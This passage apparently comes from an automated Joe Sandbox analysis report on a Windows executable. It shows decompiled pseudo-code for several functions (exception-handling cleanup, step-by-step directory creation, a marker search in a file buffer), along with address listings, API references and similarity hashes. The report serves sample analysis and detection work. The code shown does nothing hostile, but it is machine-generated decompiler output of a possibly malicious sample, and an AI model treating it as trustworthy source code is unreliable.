									E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
									_t157 = _t157 + 1;
									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
							}
							_t118 =  *((intOrPtr*)(_t199 - 0x14));
							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
							E00403A9C( *(_t199 - 0x30));
							E00403A9C( *(_t199 - 0x24));
							E00403A9C( *(_t199 - 0x3c));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							E00403800(_t199 - 0x10);
							_t123 = 0;
							__eflags = 0;
						} else {
							E00403A9C( *(_t199 - 0x30));
							E00403A9C( *(_t199 - 0x24));
							E00403A9C( *(_t199 - 0x3c));
							_t131 =  *((intOrPtr*)(_t199 - 0x10));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							__eflags = _t131 - _t157;
							if(_t131 != _t157) {
								 *((intOrPtr*)( *_t131 + 8))(_t131);
							}
							_t123 =  *((intOrPtr*)(_t199 + 0x18));
						}
					} else {
						_t198 = GetLastError();
						E00403A9C( *(_t199 - 0x30));
						E00403A9C( *(_t199 - 0x24));
						E00403A9C( *(_t199 - 0x3c));
						_t151 =  *((intOrPtr*)(_t199 - 0x10));
						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
						if(_t151 != _t157) {
							 *((intOrPtr*)( *_t151 + 8))(_t151);
						}
						_t123 = _t198;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
				return _t123;
			}

















                                          0x00408f0f
                                          0x00408f1a
                                          0x00408f1c
                                          0x00408f1e
                                          0x00408f23
                                          0x00408f26
                                          0x00408f29
                                          0x00408f2c
                                          0x00408f32
                                          0x00408f37
                                          0x00408f3a
                                          0x00408f47
                                          0x00408f47
                                          0x00408f3c
                                          0x00408f43
                                          0x00408f43
                                          0x00408f49
                                          0x00408f4f
                                          0x00408f52
                                          0x00408f57
                                          0x00408f57
                                          0x00408f5f
                                          0x00408f65
                                          0x00408f6c
                                          0x00408f6f
                                          0x00408f72
                                          0x00408f75
                                          0x00408f7f
                                          0x00408f83
                                          0x00408f86
                                          0x00408f89
                                          0x00408f8c
                                          0x00408f96
                                          0x00408f9a
                                          0x00408f9d
                                          0x00408fa0
                                          0x00408fa3
                                          0x00408fab
                                          0x00408faf
                                          0x00409079
                                          0x0040907e
                                          0x00000000
                                          0x00408fbe
                                          0x00408fc9
                                          0x00408fd1
                                          0x00409018
                                          0x00409021
                                          0x00409025
                                          0x0040902d
                                          0x00409031
                                          0x00409041
                                          0x0040904a
                                          0x0040904e
                                          0x00409056
                                          0x0040905a
                                          0x00409063
                                          0x00409067
                                          0x0040906a
                                          0x00409081
                                          0x00409081
                                          0x00409086
                                          0x00409089
                                          0x00409089
                                          0x0040908c
                                          0x0040908f
                                          0x00409092
                                          0x00409095
                                          0x0040909a
                                          0x0040909c
                                          0x0040909f
                                          0x004090db
                                          0x004090df
                                          0x004090e4
                                          0x004090e7
                                          0x004090ea
                                          0x004090ee
                                          0x004090f6
                                          0x004090fa
                                          0x004090ff
                                          0x00409103
                                          0x00409105
                                          0x0040910e
                                          0x00409116
                                          0x00409119
                                          0x0040911d
                                          0x00409125
                                          0x00409129
                                          0x0040912e
                                          0x00409130
                                          0x00409130
                                          0x00409105
                                          0x00409135
                                          0x00409141
                                          0x0040914a
                                          0x0040914d
                                          0x00409155
                                          0x0040915d
                                          0x00409162
                                          0x0040916c
                                          0x00409171
                                          0x00409171
                                          0x004090a1
                                          0x004090a4
                                          0x004090ac
                                          0x004090b4
                                          0x004090b9
                                          0x004090bc
                                          0x004090c3
                                          0x004090c5
                                          0x004090ca
                                          0x004090ca
                                          0x004090cd
                                          0x004090cd
                                          0x00408fd3
                                          0x00408fdc
                                          0x00408fde
                                          0x00408fe6
                                          0x00408fee
                                          0x00408ff3
                                          0x00408ff6
                                          0x00408fff
                                          0x00409004
                                          0x00409004
                                          0x00409007
                                          0x00409007
                                          0x00408fd1
                                          0x00409179
                                          0x00409181

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00408F0F
                                          • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,?,00000000), ref: 00408FD3
                                            • Part of subcall function 00409184: __EH_prolog.LIBCMT ref: 00409189
                                            • Part of subcall function 004092E9: __EH_prolog.LIBCMT ref: 004092EE
                                            • Part of subcall function 00408A3B: __EH_prolog.LIBCMT ref: 00408A40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$ErrorLast
                                          • String ID: KA
                                          • API String ID: 2901101390-4133974868
                                          • Opcode ID: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                                          • Instruction ID: 1ffdda1e280707f1620b0bff2a1c5a648dc862d45b7bd7d33f28712355ced64d
                                          • Opcode Fuzzy Hash: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                                          • Instruction Fuzzy Hash: 7C81677190020AABCF01EFA5C885ADEBBB5BF18318F14416EF455B32A2CB399A05CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004049DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 941 4049dd-404a02 call 413954 call 401c80 946 404a04-404a07 941->946 947 404a4a-404a59 call 401ce1 941->947 948 404a0b-404a0e 946->948 953 404a5d-404a67 call 40499c 947->953 951 404a10-404a12 948->951 952 404a18-404a1c 948->952 954 404a14-404a16 951->954 955 404a1e 951->955 956 404a21-404a23 952->956 961 404b42-404b49 call 401d7a 953->961 962 404a6d-404a78 GetLastError 953->962 954->948 955->956 956->947 958 404a25-404a2a 956->958 958->947 960 404a2c-404a2f 958->960 963 404a31-404a36 960->963 964 404a3f-404a45 call 4023ee 960->964 973 404b4e-404b51 961->973 965 404aea-404afc call 402ee1 call 405841 962->965 966 404a7a-404a7f 962->966 963->964 968 404a38-404a3a 963->968 964->947 990 404b01-404b03 965->990 970 404bb2 966->970 971 404a85-404a88 966->971 974 404bc0-404bc6 call 403a9c 968->974 977 404bb4-404bbf call 403a9c 970->977 975 404a8c-404a8f 971->975 978 404b57-404b5a 973->978 979 404bd8-404bda 973->979 987 404bc7-404bd7 974->987 982 404a91-404a93 975->982 983 404a99-404a9f 975->983 977->974 986 404b5e-404b64 978->986 979->977 988 404aa1 982->988 989 404a95-404a97 982->989 991 404aa4-404aa6 983->991 993 404b66-404b69 986->993 994 404b6f-404b75 986->994 988->991 989->975 996 404b05-404b07 990->996 997 404b09-404b11 990->997 991->970 998 404aac 991->998 999 404b77 993->999 1000 404b6b-404b6d 993->1000 995 404b7a-404b7c 994->995 1001 404b81-404bb0 call 401e3a call 40499c call 403a9c 995->1001 1002 404b7e 995->1002 1003 404b15-404b30 call 403a9c * 3 996->1003 1004 404b13 997->1004 1005 404b35-404b41 call 403a9c 997->1005 998->970 1006 404ab2-404ab8 998->1006 999->995 1000->986 1001->970 1001->973 1002->1001 1003->987 1004->1003 1005->961 1006->970 1010 404abe-404ae5 call 401e3a call 401d7a call 403a9c 1006->1010 1010->953
                                          C-Code - Quality: 98%
                                          			E004049DD(void* __ecx) {
				signed int _t64;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed char _t75;
				long _t78;
				signed int _t80;
				signed char _t82;
				signed int _t87;
				intOrPtr* _t88;
				void* _t92;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t109;
				signed int _t116;
				intOrPtr _t123;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t132;
				signed int _t135;
				void* _t138;

				E00413954(E004195A0, _t138);
				E00401C80(_t138 - 0x18, __ecx);
				_t2 = _t138 - 0x14; // 0x414be4
				_t109 =  *_t2;
				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
				_t132 = 0x5c;
				if(_t109 == 0) {
					L13:
					E00401CE1(_t138 - 0x24, _t138 - 0x18);
					_t14 = _t138 - 0x14; // 0x414be4
					_t135 =  *_t14;
					 *(_t138 - 4) = 1;
					while(1) {
						L14:
						_t64 = E0040499C( *((intOrPtr*)(_t138 - 0x18))); // executed
						__eflags = _t64;
						if(_t64 != 0) {
							break;
						}
						_t78 = GetLastError();
						__eflags = _t78 - 0xb7;
						if(_t78 == 0xb7) {
							E00402EE1(_t138 - 0x40);
							_push( *((intOrPtr*)(_t138 - 0x18)));
							 *(_t138 - 4) = 2;
							_t80 = E00405841(_t138 - 0x68, _t128); // executed
							__eflags = _t80;
							if(_t80 != 0) {
								_t82 =  *(_t138 - 0x48) >> 4;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									 *(_t138 - 4) = 1;
									E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
									break;
								} else {
									_t102 = 0;
									__eflags = 0;
									goto L31;
								}
							} else {
								_t102 = 1;
								L31:
								E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
								E00403A9C( *((intOrPtr*)(_t138 - 0x18)));
							}
						} else {
							_t17 = _t138 - 0x14; // 0x414be4
							_t87 =  *_t17;
							__eflags = _t87;
							if(_t87 == 0) {
								L44:
								_t102 = 0;
								__eflags = 0;
								L45:
								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
								_t129 =  *((intOrPtr*)(_t138 - 0x18));
								goto L46;
							} else {
								_t123 =  *((intOrPtr*)(_t138 - 0x18));
								_t88 = _t123 + _t87 * 2 - 2;
								while(1) {
									__eflags =  *_t88 - _t132;
									if( *_t88 == _t132) {
										break;
									}
									__eflags = _t88 - _t123;
									if(_t88 == _t123) {
										_t135 = _t135 | 0xffffffff;
										__eflags = _t135;
									} else {
										_t88 = _t88;
										continue;
									}
									L23:
									__eflags = _t135;
									if(__eflags < 0 || __eflags == 0) {
										goto L44;
									} else {
										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
											goto L44;
										} else {
											_t92 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
											 *(_t138 - 4) = 3;
											E00401D7A(_t138 - 0x18, _t92);
											 *(_t138 - 4) = 1;
											E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
											goto L14;
										}
									}
									goto L47;
								}
								_t135 = _t88 - _t123 >> 1;
								goto L23;
							}
						}
						goto L47;
					}
					E00401D7A(_t138 - 0x18, _t138 - 0x24);
					while(1) {
						L34:
						_t45 = _t138 - 0x14; // 0x414be4
						__eflags = _t135 -  *_t45;
						if(_t135 >=  *_t45) {
							break;
						}
						_t130 =  *((intOrPtr*)(_t138 - 0x18));
						_t70 = _t130 + 2 + _t135 * 2;
						while(1) {
							_t116 =  *_t70;
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								break;
							}
							__eflags = _t116;
							if(_t116 == 0) {
								_t135 = _t135 | 0xffffffff;
								__eflags = _t135;
							} else {
								_t70 = _t70 + 2;
								continue;
							}
							L41:
							__eflags = _t135;
							if(_t135 < 0) {
								_t50 = _t138 - 0x14; // 0x414be4
								_t135 =  *_t50;
							}
							_t74 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
							 *(_t138 - 4) = 4;
							_t75 = E0040499C( *_t74);
							 *(_t138 - 4) = 1;
							asm("sbb bl, bl");
							E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
							__eflags =  ~_t75 + 1;
							if( ~_t75 + 1 == 0) {
								goto L34;
							} else {
								goto L44;
							}
							goto L45;
						}
						_t135 = _t70 - _t130 >> 1;
						goto L41;
					}
					_t102 = 1;
					goto L45;
				} else {
					_t128 =  *((intOrPtr*)(_t138 - 0x18));
					_t96 = _t128 + _t109 * 2 - 2;
					while( *_t96 != _t132) {
						if(_t96 == _t128) {
							_t98 = _t96 | 0xffffffff;
							__eflags = _t98;
						} else {
							_t96 = _t96;
							continue;
						}
						L7:
						__eflags = _t98;
						if(_t98 <= 0) {
							goto L13;
						} else {
							__eflags = _t98 - _t109 - 1;
							if(_t98 != _t109 - 1) {
								goto L13;
							} else {
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									L12:
									E004023EE(_t138 - 0x18, _t98, 1);
									goto L13;
								} else {
									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
									if( *((short*)(_t128 + 2)) != 0x3a) {
										goto L12;
									} else {
										_t102 = 1;
										L46:
										E00403A9C(_t129);
									}
								}
							}
						}
						goto L47;
					}
					_t98 = _t96 - _t128 >> 1;
					goto L7;
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
				return _t102;
			}

























                                          0x004049e2
                                          0x004049f1
                                          0x004049f6
                                          0x004049f6
                                          0x004049f9
                                          0x00404a01
                                          0x00404a02
                                          0x00404a4a
                                          0x00404a51
                                          0x00404a56
                                          0x00404a56
                                          0x00404a59
                                          0x00404a5d
                                          0x00404a5d
                                          0x00404a60
                                          0x00404a65
                                          0x00404a67
                                          0x00000000
                                          0x00000000
                                          0x00404a6d
                                          0x00404a73
                                          0x00404a78
                                          0x00404aed
                                          0x00404af2
                                          0x00404af8
                                          0x00404afc
                                          0x00404b01
                                          0x00404b03
                                          0x00404b0c
                                          0x00404b0f
                                          0x00404b11
                                          0x00404b38
                                          0x00404b3c
                                          0x00000000
                                          0x00404b13
                                          0x00404b13
                                          0x00404b13
                                          0x00000000
                                          0x00404b13
                                          0x00404b05
                                          0x00404b05
                                          0x00404b15
                                          0x00404b18
                                          0x00404b20
                                          0x00404b28
                                          0x00404b2d
                                          0x00404a7a
                                          0x00404a7a
                                          0x00404a7a
                                          0x00404a7d
                                          0x00404a7f
                                          0x00404bb2
                                          0x00404bb2
                                          0x00404bb2
                                          0x00404bb4
                                          0x00404bb7
                                          0x00404bbc
                                          0x00000000
                                          0x00404a85
                                          0x00404a85
                                          0x00404a88
                                          0x00404a8c
                                          0x00404a8c
                                          0x00404a8f
                                          0x00000000
                                          0x00000000
                                          0x00404a91
                                          0x00404a93
                                          0x00404aa1
                                          0x00404aa1
                                          0x00404a95
                                          0x00404a96
                                          0x00000000
                                          0x00404a96
                                          0x00404aa4
                                          0x00404aa4
                                          0x00404aa6
                                          0x00000000
                                          0x00404ab2
                                          0x00404ab2
                                          0x00404ab8
                                          0x00000000
                                          0x00404abe
                                          0x00404ac6
                                          0x00404acf
                                          0x00404ad3
                                          0x00404ad8
                                          0x00404adf
                                          0x00000000
                                          0x00404ae4
                                          0x00404ab8
                                          0x00000000
                                          0x00404aa6
                                          0x00404a9d
                                          0x00000000
                                          0x00404a9d
                                          0x00404a7f
                                          0x00000000
                                          0x00404a78
                                          0x00404b49
                                          0x00404b4e
                                          0x00404b4e
                                          0x00404b4e
                                          0x00404b4e
                                          0x00404b51
                                          0x00000000
                                          0x00000000
                                          0x00404b57
                                          0x00404b5a
                                          0x00404b5e
                                          0x00404b5e
                                          0x00404b61
                                          0x00404b64
                                          0x00000000
                                          0x00000000
                                          0x00404b66
                                          0x00404b69
                                          0x00404b77
                                          0x00404b77
                                          0x00404b6b
                                          0x00404b6c
                                          0x00000000
                                          0x00404b6c
                                          0x00404b7a
                                          0x00404b7a
                                          0x00404b7c
                                          0x00404b7e
                                          0x00404b7e
                                          0x00404b7e
                                          0x00404b89
                                          0x00404b90
                                          0x00404b94
                                          0x00404b9b
                                          0x00404ba4
                                          0x00404ba8
                                          0x00404bad
                                          0x00404bb0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404bb0
                                          0x00404b73
                                          0x00000000
                                          0x00404b73
                                          0x00404bd8
                                          0x00000000
                                          0x00404a04
                                          0x00404a04
                                          0x00404a07
                                          0x00404a0b
                                          0x00404a12
                                          0x00404a1e
                                          0x00404a1e
                                          0x00404a14
                                          0x00404a15
                                          0x00000000
                                          0x00404a15
                                          0x00404a21
                                          0x00404a21
                                          0x00404a23
                                          0x00000000
                                          0x00404a25
                                          0x00404a28
                                          0x00404a2a
                                          0x00000000
                                          0x00404a2c
                                          0x00404a2c
                                          0x00404a2f
                                          0x00404a3f
                                          0x00404a45
                                          0x00000000
                                          0x00404a31
                                          0x00404a31
                                          0x00404a36
                                          0x00000000
                                          0x00404a38
                                          0x00404a38
                                          0x00404bc0
                                          0x00404bc1
                                          0x00404bc6
                                          0x00404a36
                                          0x00404a2f
                                          0x00404a2a
                                          0x00000000
                                          0x00404a23
                                          0x00404a1a
                                          0x00000000
                                          0x00404a1a
                                          0x00404bc7
                                          0x00404bcf
                                          0x00404bd7

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004049E2
                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00404A6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorH_prologLast
                                          • String ID: KA
                                          • API String ID: 1057991267-4133974868
                                          • Opcode ID: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                                          • Instruction ID: ea88e0dbf276ed2b61ac96949af9a946984d9cda694903235269fb2a0f105987
                                          • Opcode Fuzzy Hash: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                                          • Instruction Fuzzy Hash: 14512671A4010A9ACF10EBA0C945AFFBB74EF91318F14017BE601732D1D779AE46CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401AF4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1028 401af4-401b2e call 413954 call 413cc0 call 405b6d 1035 401b30-401b3e call 405975 1028->1035 1036 401b43-401b49 1028->1036 1043 401c6b-401c78 1035->1043 1038 401b57-401b60 1036->1038 1039 401b4b-401b55 1036->1039 1041 401b62-401b6c 1038->1041 1042 401b6e-401b7b 1038->1042 1039->1038 1039->1039 1041->1041 1041->1042 1044 401b7f-401b96 call 405bca 1042->1044 1046 401b9b-401b9d 1044->1046 1047 401ba3-401ba8 1046->1047 1048 401c5a 1046->1048 1049 401c56-401c58 1047->1049 1050 401bae-401bb0 1047->1050 1051 401c5c-401c6a call 405975 1048->1051 1049->1051 1052 401bb6-401bbc 1050->1052 1051->1043 1054 401bf0-401bf5 1052->1054 1055 401bbe-401bc3 1052->1055 1058 401c16-401c3b call 413980 1054->1058 1059 401bf7-401c08 call 4134d0 1054->1059 1057 401bc5-401bd6 call 4134d0 1055->1057 1055->1058 1057->1049 1070 401bd8-401bdf 1057->1070 1068 401c4a-401c54 1058->1068 1069 401c3d-401c44 1058->1069 1066 401c0a-401c14 1059->1066 1067 401bec-401bee 1059->1067 1066->1052 1067->1052 1068->1051 1069->1068 1071 401b7d 1069->1071 1070->1048 1072 401be1-401be7 call 401ee5 1070->1072 1071->1044 1072->1067
                                          C-Code - Quality: 93%
                                          			E00401AF4(void* __ecx, intOrPtr __edx, void* __eflags) {
				signed char** _t64;
				char* _t67;
				void* _t71;
				signed int _t73;
				intOrPtr _t74;
				void* _t75;
				void* _t81;
				void* _t83;
				char _t84;
				signed int _t89;
				signed int _t91;
				void* _t92;
				signed int _t103;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t112;

				_t92 = __ecx;
				E00413954(E004190C8, _t110);
				E00413CC0(0x1024, __ecx);
				_t64 =  *(_t110 + 0xc);
				_t103 = 0;
				_t64[1] = 0;
				 *((intOrPtr*)(_t110 - 0x30)) = __edx;
				 *( *_t64) =  *( *_t64) & 0x00000000;
				 *(_t110 - 0x1c) =  *(_t110 - 0x1c) | 0xffffffff;
				 *(_t110 - 4) = 0;
				if(E00405B6D(_t92) != 0) {
					 *((intOrPtr*)(_t110 - 0x14)) = 0;
					if( *((char*)(__edx)) != 0) {
						do {
							 *((intOrPtr*)(_t110 - 0x14)) =  *((intOrPtr*)(_t110 - 0x14)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x14)) + __edx)) != 0);
					}
					_t67 =  *((intOrPtr*)(_t110 + 8));
					 *((intOrPtr*)(_t110 - 0x18)) = _t103;
					if( *_t67 != 0) {
						do {
							 *((intOrPtr*)(_t110 - 0x18)) =  *((intOrPtr*)(_t110 - 0x18)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x18)) + _t67)) != 0);
					}
					_t107 = 0;
					 *(_t110 - 0xd) =  *(_t110 - 0xd) & 0x00000000;
					 *((intOrPtr*)(_t110 - 0x24)) = _t103;
					 *((intOrPtr*)(_t110 - 0x20)) = _t103;
					while(1) {
						L8:
						_t71 = E00405BCA(_t110 - 0x1c, _t110 + _t107 - 0x1030, 0x1000 - _t107, _t110 - 0x28); // executed
						if(_t71 == 0) {
							break;
						}
						_t74 =  *((intOrPtr*)(_t110 - 0x28));
						if(_t74 == _t103) {
							L23:
							_t89 = 1;
						} else {
							_t109 = _t107 + _t74;
							_t91 = _t110 - 0x1030;
							while(1) {
								_t75 = _t109;
								if( *(_t110 - 0xd) != 0) {
								}
								L12:
								if(_t103 > _t75 -  *((intOrPtr*)(_t110 - 0x18))) {
									L20:
									_t107 = _t109 - _t103;
									 *((intOrPtr*)(_t110 - 0x24)) =  *((intOrPtr*)(_t110 - 0x24)) + _t103;
									asm("adc dword [ebp-0x20], 0x0");
									E00413980(_t110 - 0x1030, _t110 + _t103 - 0x1030, _t107);
									_t112 = _t112 + 0xc;
									if( *((intOrPtr*)(_t110 - 0x20)) > 0 ||  *((intOrPtr*)(_t110 - 0x24)) > 0x100000) {
										_t89 = _t91 & 0xffffff00 | ( *(_t110 + 0xc))[1] == 0x00000000;
									} else {
										_t103 = 0;
										goto L8;
									}
								} else {
									_t83 = E004134D0(_t91,  *((intOrPtr*)(_t110 + 8)),  *((intOrPtr*)(_t110 - 0x18)));
									_t112 = _t112 + 0xc;
									if(_t83 == 0) {
										goto L23;
									} else {
										_t84 =  *_t91;
										 *((char*)(_t110 - 0x2c)) = _t84;
										if(_t84 == 0) {
											goto L24;
										} else {
											E00401EE5( *(_t110 + 0xc),  *((intOrPtr*)(_t110 - 0x2c)));
											L16:
											_t103 = _t103 + 1;
											_t91 = _t91 + 1;
											while(1) {
												_t75 = _t109;
												if( *(_t110 - 0xd) != 0) {
												}
												goto L17;
											}
											goto L12;
										}
									}
								}
								goto L25;
								L17:
								_t39 = _t110 - 0x14; // 0x414be4
								if(_t103 > _t75 -  *_t39) {
									goto L20;
								} else {
									_t40 = _t110 - 0x14; // 0x414be4
									_t81 = E004134D0(_t91,  *((intOrPtr*)(_t110 - 0x30)),  *_t40);
									_t112 = _t112 + 0xc;
									if(_t81 != 0) {
										goto L16;
									} else {
										_t103 = _t103 +  *((intOrPtr*)(_t110 - 0x14));
										_t91 = _t91 +  *((intOrPtr*)(_t110 - 0x14));
										 *(_t110 - 0xd) = 1;
										continue;
									}
									goto L26;
								}
								goto L25;
							}
						}
						L25:
						 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
						E00405975(_t110 - 0x1c);
						_t73 = _t89;
						goto L26;
					}
					L24:
					_t89 = 0;
					goto L25;
				} else {
					 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
					E00405975(_t110 - 0x1c);
					_t73 = 0;
				}
				L26:
				 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
				return _t73;
			}




















                                          0x00401af4
                                          0x00401af9
                                          0x00401b03
                                          0x00401b08
                                          0x00401b0d
                                          0x00401b11
                                          0x00401b16
                                          0x00401b19
                                          0x00401b1c
                                          0x00401b24
                                          0x00401b2e
                                          0x00401b46
                                          0x00401b49
                                          0x00401b4b
                                          0x00401b4b
                                          0x00401b51
                                          0x00401b4b
                                          0x00401b57
                                          0x00401b5a
                                          0x00401b60
                                          0x00401b62
                                          0x00401b62
                                          0x00401b68
                                          0x00401b62
                                          0x00401b6e
                                          0x00401b70
                                          0x00401b75
                                          0x00401b78
                                          0x00401b7f
                                          0x00401b7f
                                          0x00401b96
                                          0x00401b9d
                                          0x00000000
                                          0x00000000
                                          0x00401ba3
                                          0x00401ba8
                                          0x00401c56
                                          0x00401c56
                                          0x00401bae
                                          0x00401bae
                                          0x00401bb0
                                          0x00401bb6
                                          0x00401bba
                                          0x00401bbc
                                          0x00401bbc
                                          0x00401bbe
                                          0x00401bc3
                                          0x00401c16
                                          0x00401c16
                                          0x00401c18
                                          0x00401c2a
                                          0x00401c2f
                                          0x00401c34
                                          0x00401c3b
                                          0x00401c51
                                          0x00401b7d
                                          0x00401b7d
                                          0x00000000
                                          0x00401b7d
                                          0x00401bc5
                                          0x00401bcc
                                          0x00401bd1
                                          0x00401bd6
                                          0x00000000
                                          0x00401bd8
                                          0x00401bd8
                                          0x00401bdc
                                          0x00401bdf
                                          0x00000000
                                          0x00401be1
                                          0x00401be7
                                          0x00401bec
                                          0x00401bec
                                          0x00401bed
                                          0x00401bb6
                                          0x00401bba
                                          0x00401bbc
                                          0x00401bbc
                                          0x00000000
                                          0x00401bbc
                                          0x00000000
                                          0x00401bb6
                                          0x00401bdf
                                          0x00401bd6
                                          0x00000000
                                          0x00401bf0
                                          0x00401bf0
                                          0x00401bf5
                                          0x00000000
                                          0x00401bf7
                                          0x00401bf7
                                          0x00401bfe
                                          0x00401c03
                                          0x00401c08
                                          0x00000000
                                          0x00401c0a
                                          0x00401c0a
                                          0x00401c0d
                                          0x00401c10
                                          0x00000000
                                          0x00401c10
                                          0x00000000
                                          0x00401c08
                                          0x00000000
                                          0x00401bf5
                                          0x00401bb6
                                          0x00401c5c
                                          0x00401c5c
                                          0x00401c63
                                          0x00401c68
                                          0x00000000
                                          0x00401c6a
                                          0x00401c5a
                                          0x00401c5a
                                          0x00000000
                                          0x00401b30
                                          0x00401b30
                                          0x00401b37
                                          0x00401b3c
                                          0x00401b3c
                                          0x00401c6b
                                          0x00401c70
                                          0x00401c78

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: KA$KA
                                          • API String ID: 3519838083-594506476
                                          • Opcode ID: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                                          • Instruction ID: 3866b3b7da3d7396f9922ec017f7e66c93d936b9f161a27d318f0a0663603341
                                          • Opcode Fuzzy Hash: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                                          • Instruction Fuzzy Hash: 7451CF72D042199FDF11DFA4C940BEEBBB4AF05394F14416AE851732E2E3789E85CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416CB8 Relevance: 4.6, APIs: 3, Instructions: 51COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
